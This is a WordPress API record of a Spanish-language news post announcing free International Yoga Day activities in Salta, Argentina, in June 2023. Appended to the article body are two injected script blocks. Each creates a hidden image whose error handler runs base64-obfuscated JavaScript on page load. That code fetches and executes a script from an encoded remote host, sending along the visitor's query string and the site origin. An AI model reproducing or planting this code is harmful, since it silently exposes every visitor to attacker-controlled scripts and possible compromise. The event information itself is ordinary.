{"id":2707,"date":"2023-06-09T09:46:18","date_gmt":"2023-06-09T12:46:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2707"},"modified":"2025-08-14T00:15:30","modified_gmt":"2025-08-14T03:15:30","slug":"actividades-en-salta-para-conmemorar-el-dia-internacional-del-yoga","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2707","title":{"rendered":"Actividades en Salta para conmemorar el D\u00eda Internacional del Yoga"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#cc0436\"><em>La Comunidad Y\u00f3guica de Salta organiza charlas y pr\u00e1cticas gratuitas para promocionar la actividad. Del 21 al 23 de junio habr\u00e1 encuentros virtuales y el s\u00e1bado 24 de junio ser\u00e1 la celebraci\u00f3n presencial en el Centro Cultural Am\u00e9rica.<\/em><\/h4>\n\n\n\n<p>Las actividades para conmemorar el D\u00eda del Yoga en Salta son organizadas por noveno a\u00f1o consecutivo desde la Fundaci\u00f3n Danzarte y cuentan con el auspicio del Ministerio de Turismo y Deportes.<\/p>\n\n\n\n<p>Del 21 al 24 de junio habr\u00e1 pr\u00e1cticas, charlas y dem\u00e1s actividades que promueven el bienestar f\u00edsico, mental, emocional y espiritual de las personas. Cabe destacar que todas las actividades que se realizar\u00e1n en el marco de este evento ser\u00e1n totalmente libres y gratuitas.<\/p>\n\n\n\n<p>Los d\u00edas 21, 22 y 23 de junio los encuentros ser\u00e1n virtuales garantizando el acceso a la mayor cantidad de p\u00fablico posible, desde Salta para el interior y el mundo. Ser\u00e1n transmitidos por las redes oficiales de la Secretar\u00eda de Deportes.<\/p>\n\n\n\n<p>En tanto, el s\u00e1bado 24 ser\u00e1 de manera presencial en el Centro Cultural Am\u00e9rica, Mitre 23, de 9 a 20 hs. Todas las actividades est\u00e1n destinadas para toda la familia.<\/p>\n\n\n\n<p>Los instructores, profesores, centros y espacios de Yoga pueden sumarse a las actividades contact\u00e1ndose en la p\u00e1gina de Instagram @diayoga_salta<\/p>\n\n\n\n<p><strong>D\u00eda del Yoga<\/strong><\/p>\n\n\n\n<p>En diciembre de 2014, las Naciones Unidas proclamaron el 21 de junio como el D\u00eda Internacional del Yoga, mediante la Resoluci\u00f3n N\u00b0 69\/131; con el objetivo de difundir los beneficios hol\u00edsticos de esta pr\u00e1ctica milenaria. Desde entonces, cada a\u00f1o comunidades y\u00f3guicas en todos los pa\u00edses del mundo, celebran la actividad.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/actividades-en-salta-para-conmemorar-el-dia-internacional-del-yoga-90073\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Comunidad Y\u00f3guica de Salta organiza charlas y pr\u00e1cticas gratuitas para promocionar la actividad. Del 21 al 23 de junio habr\u00e1 encuentros virtuales y el s\u00e1bado 24 de junio ser\u00e1 la celebraci\u00f3n presencial en el Centro Cultural Am\u00e9rica. Las actividades para conmemorar el D\u00eda del Yoga en Salta son organizadas por noveno a\u00f1o consecutivo desde [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2708,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-2707","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-salud-bienestar"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2707"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2707"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2707\/revisions"}],"predecessor-version":[{"id":7064,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2707\/revisions\/7064"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2708"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2707"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2707"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2707"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}